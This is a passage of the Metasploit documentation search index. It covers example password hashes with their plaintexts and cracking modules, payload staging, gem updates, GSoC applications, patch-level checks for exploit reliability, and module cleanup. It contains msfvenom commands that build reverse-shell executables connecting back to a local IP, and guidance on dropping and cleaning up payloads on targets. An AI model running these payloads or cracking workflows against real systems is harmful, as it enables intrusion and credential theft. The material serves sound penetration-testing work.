hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1 creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1 creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5 # OSX creds add 
user:xsha_hashcat hash:1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683 jtr:xsha creds add user:pbkdf2_hashcat hash:$ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222 jtr:PBKDF2-HMAC-SHA512 creds add user:xsha512_hashcat hash:648742485c9b0acd786a233b2330197223118111b481abfa0ab8b3e8ede5f014fc7c523991c007db6882680b09962d16fd9c45568260531bdb34804a5e31c22b4cfeb32d jtr:xsha512 # webapps creds add user:mediawiki_hashcat hash:$B$56668501$0ce106caa70af57fd525aeaf80ef2898 jtr:mediawiki creds add user:phpass_p_hashcat hash:$P$984478476IagS59wHZvyQMArzfx58u. jtr:phpass creds add user:phpass_h_hashcat hash:$H$984478476IagS59wHZvyQMArzfx58u. jtr:phpass creds add user:atlassian_hashcat hash:{PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa jtr:PBKDF2-HMAC-SHA1 # other creds add user:hmac_password hash:'&amp;lt;[email protected]&amp;gt;#3f089332842764e71f8400ede97a84c9' jtr:hmac-md5 creds add user:vmware_ldap hash:'$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6' jtr:dynamic_82 creds add user:admin hash:'$pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU' jtr:pbkdf2-sha256 . This data breaks down to the following table: . | Hash Type | Username | Hash | Password | jtr format | Modules which dump this info | Modules which crack this | . | DES | des_password | rEK1ecacw.7.c | password | des | post/aix/gather/hashdump | auxiliary/analyze/crack_aix auxiliary/analyze/crack_linux | . | MD5 | md5_password | $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ | password | md5 | post/linux/gather/hashdump | auxiliary/analyze/crack_linux | . | BSDi | bsdi_password | _J9..K0AyUubDrfOgO4s | password | bsdi | post/linux/gather/hashdump | auxiliary/analyze/crack_linux | . 
| SHA256 | sha256_password | $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 | password | sha256,crypt | post/linux/gather/hashdump | auxiliary/analyze/crack_linux | . | SHA512 | sha512_password | $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 | password | sha512,crypt | post/linux/gather/hashdump | auxiliary/analyze/crack_linux | . | Blowfish | blowfish_password | $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe | password | bf | post/linux/gather/hashdump | auxiliary/analyze/crack_linux | . | Lanman | lm_password | E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C | password | lm | post/windows/gather/hashdump | auxiliary/analyze/crack_windows | . | NTLM | nt_password | AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C | password | nt | post/linux/gather/hashdump | auxiliary/analyze/crack_windows | . | NetNTLMv1 | u4-netntlm | u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c | hashcat | netntlm | &nbsp; | auxiliary/analyze/crack_windows | . | NetNTLMv2 | admin | admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030 | hashcat | netntlmv2 | &nbsp; | auxiliary/analyze/crack_windows | . | MSCash | mscash-test1 | M$test1#64cd29e36a8431a2b111378564a10631 | test1 | mscash | &nbsp; | auxiliary/analyze/crack_windows | . | MSCash2 | mscash2-hashcat | $DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f | hashcat | mscash2 | &nbsp; | auxiliary/analyze/crack_windows | . | MSSQL (2005) | mssql05_toto | 0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 | toto | mssql05 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases | . 
| MSSQL | mssql_foo | 0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 | foo | mssql | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases | . | MSSQL (2012) | mssql12_Password1! | 0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 | Password! | mssql12 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases | . | MySQL | mysql_probe | 445ff82636a7ba59 | probe | mysql | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases | . | MySQL SHA1 | mysql-sha1_tere | *5AD8F88516BD021DD43F171E2C785C69F8E54ADB | tere | mysql-sha1 | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases | . | Oracle | simon | 4F8BC1809CB2AF77 | A | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | . | Oracle | SYSTEM | 9EEDFA0AD26C6D52 | THALES | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | . | Oracle 11 | DEMO | S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C | epsilon | raw-sha1,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | . | Oracle 11 | oracle11_epsilon | S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C | epsilon | raw-sha1,oracle | modules/auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | . 
| Oracle 12 | oracle12_epsilon | H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B | epsilon | pbkdf2,oracle12c | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | . | Postgres | example | md5be86a79bf2043622d58d5453c47d4860 | password | raw-md5,postgres | auxiliary/scanner/postgres/postgres_hashdump | auxiliary/analyze/crack_databases | . | Android (Samsung) SHA1 | samsungsha1 | D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 | 1234 | android-samsung-sha1 | post/android/gather/hashdump | modules/auxiliary/analyze/crack_mobile | . | Android (non-Samsung) SHA1 | androidsha1 | 9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 | 1234 | android-sha1 | post/android/gather/hashdump | modules/auxiliary/analyze/crack_mobile | . | Android MD5 | androidmd5 | 1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 | 1234 | android-md5 | post/android/gather/hashdump | modules/auxiliary/analyze/crack_mobile | . | OSX 10.4-10.6 | xsha_hashcat | 1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683 | hashcat | xsha | post/osx/gather/hashdump | modules/auxiliary/analyze/crack_osx | . | OSX 10.8+ | pbkdf2_hashcat | $ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f9$ | hashcat | PBKDF2-HMAC-SHA512 | post/osx/gather/hashdump | modules/auxiliary/analyze/crack_osx | . | OSX 10.7 | xsha512_hashcat | 648742485c9b0acd786a233b2330197223118111b481abfa0ab8b3e8ede5f014fc7c523991c007db6882680b09962d16fd9c45568260531bdb34804a5e31c22b4cfeb32d | hashcat | xsha512 | post/osx/gather/hashdump | modules/auxiliary/analyze/crack_osx | . | HMAC-MD5 | hmac_password | &amp;lt;[email protected]&amp;gt;#3f089332842764e71f8400ede97a84c9 | password | hmac-md5 | auxiliary/server/capture/smtp | &nbsp; | . 
| SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap | $dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6 | TestPass123# | dynamic_82 | &nbsp; | &nbsp; | . | MediaWiki | mediawiki_hashcat | $B$56668501$0ce106caa70af57fd525aeaf80ef2898 | hashcat | mediawiki | &nbsp; | modules/auxiliary/analyze/crack_webapps | . | PHPPass (P type) | phpass_p_hashcat | $P$984478476IagS59wHZvyQMArzfx58u. | hashcat | phpass | &nbsp; | modules/auxiliary/analyze/crack_webapps | . | PHPPass (H type) | phpass_h_hashcat | $H$984478476IagS59wHZvyQMArzfx58u. | hashcat | phpass | &nbsp; | modules/auxiliary/analyze/crack_webapps | . | Atlassian | atlassian_hashcat | {PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa | hashcat | PBKDF2-HMAC-SHA1 | &nbsp; | modules/auxiliary/analyze/crack_webapps | . ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#example-hashes",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#example-hashes"
  },"198": {
    "doc": "Hashes and Password Cracking",
    "title": "Adding a New Hash",
    "content": "Only hashes that are found by Metasploit modules were added to the hash identification library and the other functions. New hashes are developed often, and new modules which find a new type of hash will most definitely be created. So what are the steps to add a new hash type to Metasploit? . | Add a new identify algorithm to: framework/hashes.rb. You may want to consult external programs such as hashid or hash-identifier for suggestions. | Add the hash to the spec to ensure it works right now and in future updates: framework/hashes/identify_spec.rb | . | Make sure the hashes are saved in the DB in the JTR format. A good source to identify what the hashes look like is pentestmonkey. | If applicable, add it into the appropriate cracker module (or create a new one). Example for Windows related hashes. | Find the hashcat hash mode, and add a JTR name to hashcat hash mode lookup | If hashcat uses a different format for the hash string, add a JTR to hashcat hash format conversion to the formatter | Update this Wiki . | Add the JTR to hashcat conversion | Add example hash(es) | . | . ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#adding-a-new-hash",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#adding-a-new-hash"
  },"199": {
    "doc": "Hashes and Password Cracking",
    "title": "Hashes and Password Cracking",
    "content": " ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html"
  },"200": {
    "doc": "How payloads work",
    "title": "How Payloads Work",
    "content": "Payload modules are stored in modules/payloads/{singles,stages,stagers}/<platform>. When the framework starts up, stages are combined with stagers to create a complete payload that you can use in exploits. Then, handlers are paired with payloads so the framework will know how to create sessions with a given communications mechanism. Payloads are given reference names that indicate all the pieces, like so: . | Staged payloads: <platform>/[arch]/<stage>/<stager> | Single payloads: <platform>/[arch]/<single> | . This results in payloads like windows/x64/meterpreter/reverse_tcp. Breaking that down, the platform is windows, the architecture is x64, the final stage we’re delivering is meterpreter, and the stager delivering it is reverse_tcp. Note that architecture is optional because in some cases it is either unnecessary or implied. An example is php/meterpreter/reverse_tcp. Arch is unneeded for PHP payloads because we’re delivering interpreted code rather than native. Singles . Single payloads are fire-and-forget. They can create a communications mechanism with Metasploit, but they don’t have to. An example of a scenario where you might want a single is when the target has no network access – a fileformat exploit delivered via USB key is still possible. Stagers . Stagers are a small stub designed to create some form of communication and then pass execution to the next stage. Using a stager solves two problems. First, it allows us to use a small payload initially to load up a larger payload with more functionality. Second, it makes it possible to separate the communications mechanism from the final stage so one payload can be used with multiple transports without duplicating code. Stages . Since the stager will have taken care of dealing with any size restrictions by allocating a big chunk of memory for us to run in, stages can be arbitrarily large. 
One advantage of that is the ability to write final-stage payloads in a higher-level language like C. ",
    "url": "/docs/using-metasploit/basics/how-payloads-work.html#how-payloads-work",
    "relUrl": "/docs/using-metasploit/basics/how-payloads-work.html#how-payloads-work"
  },"201": {
    "doc": "How payloads work",
    "title": "Delivering stages",
    "content": ". | The IP address and port you want the payload to connect back to are embedded in the stager. As discussed above, all staged payloads are no more than a small stub that sets up communication and executes the next stage. When you create an executable using a staged payload, you’re really just creating the stager. So the following commands would create functionally identical exe files: msfvenom -f exe LHOST=192.168.1.1 -p windows/meterpreter/reverse_tcp msfvenom -f exe LHOST=192.168.1.1 -p windows/shell/reverse_tcp msfvenom -f exe LHOST=192.168.1.1 -p windows/vncinject/reverse_tcp . (Note that these are functionally identical – there is a lot of randomization that goes into it so no two executables are exactly the same.) . | The Ruby side acts as a client using whichever transport mechanism was set up by the stager (e.g.: tcp, http, https). | In the case of a shell stage, Metasploit will connect the remote process’s stdio to your terminal when you interact with it. | In the case of a Meterpreter stage, Metasploit will begin speaking the Meterpreter wire protocol. | . | . ",
    "url": "/docs/using-metasploit/basics/how-payloads-work.html#delivering-stages",
    "relUrl": "/docs/using-metasploit/basics/how-payloads-work.html#delivering-stages"
  },"202": {
    "doc": "How payloads work",
    "title": "How payloads work",
    "content": " ",
    "url": "/docs/using-metasploit/basics/how-payloads-work.html",
    "relUrl": "/docs/using-metasploit/basics/how-payloads-work.html"
  },"203": {
    "doc": "Adding and Updating",
    "title": "Adding and Updating",
    "content": "Update: We have automated this process (it runs every Thursday at noon US Central Time), and 99.9% of the time you will not need to follow any of the below steps. That said, if you need to update a gem in a PR, this is still a good procedure to follow. Sometimes you might want to pull in a new Ruby library or update an existing one to get more functionality. Metasploit leverages Bundler to manage Ruby gems and make dependencies easy. This document goes over the things you need to know when updating or adding gems to Metasploit. The Gemfile . Gems that are only sometimes used (say, only in test mode, or only when running with a database) are listed in a relevant Bundler group (test or db respectively) in the root Gemfile. The metasploit-framework.gemspec file . Gems that are always needed by Metasploit are kept in the metasploit-framework.gemspec file (this file is actually pulled into the Gemfile when calculating dependencies). The Lock File . The Gemfile.lock file holds the absolute versions of the Gems we want and keeps track of all the subdependencies. You should never need to manually edit this file: bundler will do it for you when you run bundle install after adding a gem. We keep this committed in the repo to ensure that all users are always on the same gem versions. Updating or adding a gem . If the gem is needed only for a specific Bundler group (like test or db), you should update the Gemfile: . | Add the Gem you want to the correct Group, or just update the version constraint. Check Bundler’s docs for the various ways to express version constraints: . gem 'my_favorite', '~> 1.0' . | Run bundle install | Commit any changes to the Gemfile.lock file | . If the gem is needed any time metasploit-framework is used, you should update the metasploit-framework.gemspec file: . | Add the gem as a runtime dependency, or just update the version constraint. Check Bundler’s docs for the various ways to express version constraints: . 
spec.add_runtime_dependency 'my_favorite_gem', '~> 3.0.1' . | Run bundle install | Commit any changes to the Gemfile.lock file. | . Gemfile.local . A Gemfile.local file is useful for adding temporary gems to the metasploit-framework, like pry-stack-explorer or other handy debugging libs; you don’t want to commit these gems into the repo, but might need them from time to time. To use a Gemfile.local file: . | Rename the Gemfile.local.example file in the repo root to Gemfile.local | Add the temporary gems you want to this file | Run bundle install | Make sure you do not commit the Gemfile.lock: git checkout -- Gemfile.lock | . ",
    "url": "/docs/development/maintainers/ruby-gems/how-to-add-and-update-gems-in-metasploit-framework.html",
    "relUrl": "/docs/development/maintainers/ruby-gems/how-to-add-and-update-gems-in-metasploit-framework.html"
  },"204": {
    "doc": "How to Apply to GSoC",
    "title": "2022 Timeline",
    "content": "An updated list of the application timeline can be found at https://developers.google.com/open-source/gsoc/timeline. Please refer to this link for any updates that Google may make, as they have been known to change the timeline for certain dates in the past. ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#2022-timeline",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#2022-timeline"
  },"205": {
    "doc": "How to Apply to GSoC",
    "title": "Important Dates",
    "content": ". | GSoC Applications Open: April 4th at 1800 UTC | GSoC Applications Close: April 19th at 1800 UTC for 2022 GSoC applications. No late submissions will be accepted, period. | Accepted applications announced: May 20th at 1800 UTC | Programming Starts: June 13th. | . ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#important-dates",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#important-dates"
  },"206": {
    "doc": "How to Apply to GSoC",
    "title": "Important Changes for 2022",
    "content": ". | All submissions (including both draft submissions and final submissions) must be in PDF format when being submitted to GSoC’s website. If you would like us to review your submission prior to the final deadline, please submit a Google Drive link to your DOC formatted proposal to msfdev [AT] metasploit [DOT] com and make sure that you have enabled commenting so that potential mentors can provide feedback. | . ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#important-changes-for-2022",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#important-changes-for-2022"
  },"207": {
    "doc": "How to Apply to GSoC",
    "title": "2022 Idea List",
    "content": "You can find the current list of GSoC ideas at GSoC-2022-Project-Ideas. Please see the note at the bottom of this page if you are interested in submitting your own idea, as this will require approval. ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#2022-idea-list",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#2022-idea-list"
  },"208": {
    "doc": "How to Apply to GSoC",
    "title": "Getting started",
    "content": "Students interested in GSoC can start by reading Google’s official guides. https://developers.google.com/open-source/gsoc/help/student-advice . Review all of the student guide and carefully read the proposal writing section. A listed idea is a seed for GSoC students to expand on and propose how to design and implement a solution. You can start by investigating the code base and how existing users interact with msfconsole functionality. Think through scenarios on how a user might want to interact with the proposed idea. A place to get started with contributing to Metasploit is here and expanded on here. GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area; however, by starting with understanding the most common contribution pattern you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind. Once you have started digging, feel free to ask questions that help you understand the concepts behind the idea you would like to propose. Initial proposals can be sent for feedback before official submission opens to [email protected]. All proposals must be officially submitted during the Student Application Period through the GSoC official site. At a bare minimum, proposals should include the following: . ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#getting-started",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#getting-started"
  },"209": {
    "doc": "How to Apply to GSoC",
    "title": "Title",
    "content": "A brief description of what you would like to work on. See GSoC-2022-Project-Ideas for ideas. ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#title",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#title"
  },"210": {
    "doc": "How to Apply to GSoC",
    "title": "Vitals",
    "content": ". | Your name | Contact info - include at least: . | an email address | github user name | Freenode nick/Slack nick | . | . ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#vitals",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#vitals"
  },"211": {
    "doc": "How to Apply to GSoC",
    "title": "Skillz",
    "content": "What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well. What other projects have you worked on before? . ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#skillz",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#skillz"
  },"212": {
    "doc": "How to Apply to GSoC",
    "title": "Your project",
    "content": "Fill in the details. What exactly do you want to accomplish? . ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#your-project",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#your-project"
  },"213": {
    "doc": "How to Apply to GSoC",
    "title": "Past Submissions",
    "content": "If you are interested in looking at past accepted submissions and projects, you can find them at https://summerofcode.withgoogle.com/archive by clicking on any year from 2017 onwards (with the exception of 2019, as Metasploit did not participate that year). Then click on the Security tag and search for Metasploit. Scroll down to the bottom and you will see past successful applications and the associated code for each successful submission. Submissions from 2020 onwards also include copies of the proposal that was sent in by the accepted contributor. ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#past-submissions",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#past-submissions"
  },"214": {
    "doc": "How to Apply to GSoC",
    "title": "How to Apply to GSoC",
    "content": "Note: Final project proposals must be submitted to Google through the GSoC Program Website, as stated in the rules. Before submitting to the GSoC website, it is also helpful to solicit proposal feedback. This can be done by reaching out to us on our Slack at https://metasploit.com/slack via the #gsoc channel, or by sending an email to msfdev [@] metasploit [dot] com. If you don’t hear back right away on a proposal, don’t give up! Contributors may be busy, or you may need to try again to get someone’s attention (but don’t spam). ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html"
  },"215": {
    "doc": "How to check Microsoft patch levels for your exploit",
    "title": "How to collect Microsoft patches",
    "content": "If you’re kind of hardcore with patch diffing, you probably maintain your own database of DLLs. But this may require a lot of disk space, so for most people it’s probably not worth it unless you have to look at these DLLs pretty much every day. A more economical way is to track all these patches and have some sort of interface that allows quick and easy access to them. Luckily, Microsoft maintains a list of all the patches in an Excel file that you can download here: . https://www.microsoft.com/en-us/download/confirmation.aspx?id=36982 . If you prefer some sort of GUI for searching, you can use Microsoft’s Security Update Guide. You can edit this dashboard to add specific filters, such as the Windows version, Internet Explorer version, Office, etc. For example, if I want to find all the Internet Explorer 10 patches for Windows 7 since its debut, I can add the following filters: . | Windows 7 | Internet Explorer | . And then when I sort by date from September 2012 to 2014, I get 22 results. But of course, this number will go up because IE 10 is still supported. There are also other desktop or command-line tools that will basically check for missing patches on your Windows system, such as the Windows Update PowerShell Module; in some cases this may work better. ",
    "url": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html#how-to-collect-microsoft-patches",
    "relUrl": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html#how-to-collect-microsoft-patches"
  },"216": {
    "doc": "How to check Microsoft patch levels for your exploit",
    "title": "Patch extraction",
    "content": ". | Old patches used to be packaged as EXEs, and this kind can be extracted by using decompression tools such as 7zip. Internet Explorer 6 patches, for example, can be extracted this way. | Newer patches packaged as EXEs support the /X flag for extraction. For example, the following will extract the patch under the same directory. Patches such as Internet Explorer 8 (for XP) can be extracted this way. | . Windows[Something]-KB[Something]-x86-ENU.exe /X:. | Most patches nowadays are packaged as MSUs. Here’s what you have to do: | . | Put all your *.msu files under the same directory (in Windows) | Run tools/exploit/extract_msu.bat [absolute directory path to *.msu files] | extract_msu.bat should automatically extract all the *.msu files. The “extracted” sub-directory in each new folder is where you can find the updated components. | . Note: The update folders might be labeled as GDR or QFE. GDR indicates General Distribution Release, while QFE means Quick Fix Engineering. ",
    "url": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html#patch-extraction",
    "relUrl": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html#patch-extraction"
  },"217": {
    "doc": "How to check Microsoft patch levels for your exploit",
    "title": "Checking gadgets in patches",
    "content": "The quickest way to check gadgets across different patches is by using Metasploit’s msfpescan utility (or msfbinscan, which is smart enough to know it’s PE format). It’s really easy: all you have to do is put the DLLs in the same directory, and then do: . $ ./msfbinscan -D -a [address] -A 10 /patches/*.dll . What that does is disassemble all the DLLs under that directory, at that specific address, for 10 bytes. You can probably automate a little more to quickly identify which DLLs don’t have the right gadget, and if that’s the case for you, that means the gadget you’re using is unsafe. You should find another one that’s more reliable. ",
    "url": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html#checking-gadgets-in-patches",
    "relUrl": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html#checking-gadgets-in-patches"
  },"218": {
    "doc": "How to check Microsoft patch levels for your exploit",
    "title": "How to check Microsoft patch levels for your exploit",
    "content": "Checking patch levels is an important task for vulnerability research or exploit development. As a bug-hunting kind of guy, you should care about patch levels because say you have an 0day for Internet Explorer 10, you can’t always assume it affects all IE 10 builds since its debut (2012). If you realize your 0day only affects one or two builds, how much of a threat is it? Probably not as bad as you think. If you’re an exploit developer, you’re checking patches for another reason: maximum reliability. There are a lot of ways your exploit can fail, a bad gadget due to a change by a system update is easily one of them. If this update occurred at a pretty early stage, chances are your exploit will fail a lot, too. ",
    "url": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html"
  },"219": {
    "doc": "Cleanup",
    "title": "On this page",
    "content": ". | Cleanup method | FileDropper Mixin | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html#on-this-page",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html#on-this-page"
  },"220": {
    "doc": "Cleanup",
    "title": "Cleanup method",
    "content": "Metasploit has a handy cleanup method that is always called when the module terminates, whether it is successful or not. This method can be overridden by any module to add its own cleanup routines. For example, this might be useful to put some files back on the target after the module had deleted them. Another scenario would be to restore the settings in a web application that were modified by the exploit. This is the right place to clean things up. Framework itself implements this method to disconnect connections, call the handler cleanup routines, etc. Some other mixins, such as Msf::Exploit::FileDropper (see the next section) or Msf::Exploit::Remote::Kerberos::Client, override this method to add their own cleanup code. It is extremely important to always call super in your cleanup method to make sure Framework and any other mixins clean up themselves properly. Here is an example that restores a configuration file after it was deleted by the module: . def cleanup unless self.conf_content.nil? write_file(self.conf_file, self.conf_content) end super end . Here is another example of a cleanup method that deletes a temporary Git repository: . def cleanup super return unless need_cleanup? print_status('Cleaning up') uri = normalize_uri(datastore['USERNAME'], self.repo_name, '/settings') csrf = get_csrf(uri) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(datastore['TARGETURI'], uri), 'ctype' => 'application/x-www-form-urlencoded', 'vars_post' => { _csrf: csrf, action: 'delete', repo_name: self.repo_name } }) unless res fail_with(Failure::Unreachable, 'Unable to reach the settings page') end unless res.code == 302 fail_with(Failure::UnexpectedReply, 'Delete repository failure') end print_status(\"Repository #{self.repo_name} deleted.\") nil end . ",
    "url": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html#cleanup-method",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html#cleanup-method"
  },"221": {
    "doc": "Cleanup",
    "title": "FileDropper Mixin",
    "content": "In some exploitation scenarios such as local privilege escalation, command execution, write privilege attacks, SQL Injections, etc, it is very likely that you have to upload one or more malicious files in order to gain control of the target machine. Well, a smart attacker shouldn’t leave anything behind, so if a module needs to drop something onto the file system, it’s important to remove it right after the purpose is served. And that is why we created the FileDropper mixin. The FileDropper mixin is a file manager that allows you to keep track of files, and then delete them when a session is created. To use it, first include the mixin: . include Msf::Exploit::FileDropper . Next, tell the FileDropper mixin where the file is going to be after a session is created by using the register_file_for_cleanup method. Each file name should either be a full path or relative to the current working directory of the session. For example, if I want to upload a payload to the target machine’s remote path: C:\\Windows\\System32\\payload.exe, then my statement can be: . register_file_for_cleanup(\"C:\\\\Windows\\\\System32\\\\payload.exe\") . If my session’s current directory is already in C:\\Windows\\System32\\, then you can: . register_file_for_cleanup(\"payload.exe\") . If you wish to register multiple files, you can also provide the file names as arguments: . register_file_for_cleanup(\"file_1.vbs\", \"file_2.exe\", \"file_1.conf\") . Note that if your exploit module uses on_new_session, you are actually overriding FileDropper’s on_new_session. ",
    "url": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html#filedropper-mixin",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html#filedropper-mixin"
  },"222": {
    "doc": "Cleanup",
    "title": "Cleanup",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html"
  },"223": {
    "doc": "How to Configure DNS",
    "title": "Metasploit DNS",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#metasploit-dns",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#metasploit-dns"
  },"224": {
    "doc": "How to Configure DNS",
    "title": "Background",
